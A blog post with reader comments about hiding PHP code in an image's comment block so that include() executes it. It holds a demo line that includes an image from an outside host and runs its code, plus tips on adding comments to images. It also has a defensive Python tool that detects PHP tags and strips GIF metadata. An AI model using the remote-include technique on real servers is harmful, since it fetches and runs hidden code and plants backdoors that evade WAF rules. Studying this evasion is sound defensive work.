As reported by the ISC, some people are using images to hide PHP code: if an image contains PHP code, for example in its comment section, it can be included like an ordinary PHP file, and the PHP code will be happily executed. It may be a great way to hide malicious code on hacked servers and to bypass some IDS/WAF rules.
Here's a demo: create a PHP file that includes this innocent-looking image:
<?php
// Remote inclusion of an image whose comment block carries PHP code (demo from the post).
include("http://mdessus.free.fr/Divers/imgwithphpcmd.gif");
?>
Browse to the URL of the file you just created, and voila:
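The defensive side of the demo, as an added example that is not part of the original post: a small pure-Python tool that walks the GIF89a block structure of an uploaded file, flags PHP open tags anywhere in the raw bytes, and rebuilds the image without its comment, application and plain-text extension blocks (the places where hidden code normally lives), keeping only what is needed to render it. The sample image, the comment payload and all function names are constructed for this example.

```python
"""Detect and strip PHP code hidden in GIF metadata.

Added example, not the original post's code. Pure Python: it parses the
GIF89a block structure directly, so it runs without any imaging library.
"""
import re
import struct

# Openers the PHP parser treats as the start of code. Any of these inside an
# uploaded image is a red flag if that file can ever reach include().
PHP_TAG_RE = re.compile(rb'<\?php|<\?=|<script\s+language\s*=\s*["\']?php', re.IGNORECASE)

EXTENSION = 0x21
IMAGE_DESCRIPTOR = 0x2C
TRAILER = 0x3B
COMMENT_EXT = 0xFE
GRAPHIC_CONTROL_EXT = 0xF9


def find_php_tags(data: bytes) -> list:
    """Return (offset, tag) for every PHP open tag found in the raw bytes."""
    return [(m.start(), m.group(0)) for m in PHP_TAG_RE.finditer(data)]


def _color_table_size(packed: int) -> int:
    """Byte size of a colour table whose presence and size are flagged in `packed`."""
    return 3 * (2 ** ((packed & 0x07) + 1)) if packed & 0x80 else 0


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed sub-blocks terminated by 0x00."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def strip_gif_metadata(data: bytes) -> bytes:
    """Rebuild a GIF keeping only what is needed to render it.

    Header, logical screen descriptor, colour tables, graphic control
    extensions and image data are copied; comment, application and
    plain-text extensions are dropped.
    """
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    pos = 13 + _color_table_size(data[10])  # header + LSD + global colour table
    out = bytearray(data[:pos])
    while pos < len(data):
        kind = data[pos]
        if kind == TRAILER:
            out.append(TRAILER)
            return bytes(out)
        if kind == EXTENSION:
            label = data[pos + 1]
            end = _skip_sub_blocks(data, pos + 2)
            if label == GRAPHIC_CONTROL_EXT:  # needed for animation/transparency
                out += data[pos:end]
            pos = end
        elif kind == IMAGE_DESCRIPTOR:
            packed = data[pos + 9]
            end = pos + 10 + _color_table_size(packed) + 1  # + LZW minimum code size
            end = _skip_sub_blocks(data, end)
            out += data[pos:end]
            pos = end
        else:
            raise ValueError(f"unknown block 0x{kind:02x} at offset {pos}")
    raise ValueError("missing trailer")


def build_sample_gif(comment: bytes) -> bytes:
    """Constructed 1x1 GIF89a carrying `comment` in a comment extension block."""
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + b"\x00\x00\x00\xff\xff\xff"
    comment_ext = bytes([EXTENSION, COMMENT_EXT])
    for i in range(0, len(comment), 255):  # sub-blocks hold at most 255 bytes
        chunk = comment[i:i + 255]
        comment_ext += bytes([len(chunk)]) + chunk
    comment_ext += b"\x00"
    image = bytes([IMAGE_DESCRIPTOR]) + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    image += b"\x02\x02\x44\x01\x00"  # LZW min code size 2; codes: clear, pixel 0, end
    return header + comment_ext + image + bytes([TRAILER])


if __name__ == "__main__":
    tainted = build_sample_gif(b'<?php echo "marker"; ?>')  # benign constructed payload
    print("tags in upload:", find_php_tags(tainted))
    clean = strip_gif_metadata(tainted)
    print("tags after strip:", find_php_tags(clean), "size", len(tainted), "->", len(clean))
```

Re-encoding the upload (here by dropping metadata blocks; a full decode-and-re-encode through an image library is stronger) is the fix that answers the "how do developers get rid of this" question, but it only matters because the file can be included at all: uploads should never live under a path that `include()` or a remote URL wrapper can reach, and `allow_url_include` should stay off.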
Comment by Mathieu Dessus
May 23, 2011, 9:55 pm
Have a look at the allow_url_include directive: if people are not allowed to upload files to the server, this will prevent remote file inclusion.
Comment by Andrei
May 23, 2011, 8:52 pm
How can developers get rid of these scripts inside uploaded images?
Comment by Mathieu Dessus
February 15, 2010, 5:25 pm
Just open an image with your favorite image editor and find where you can add a comment. In Gimp, select Image > Image Properties.
Comment by AccesInterzis
February 15, 2010, 5:08 pm
Can you show how PHP code can be added into an image?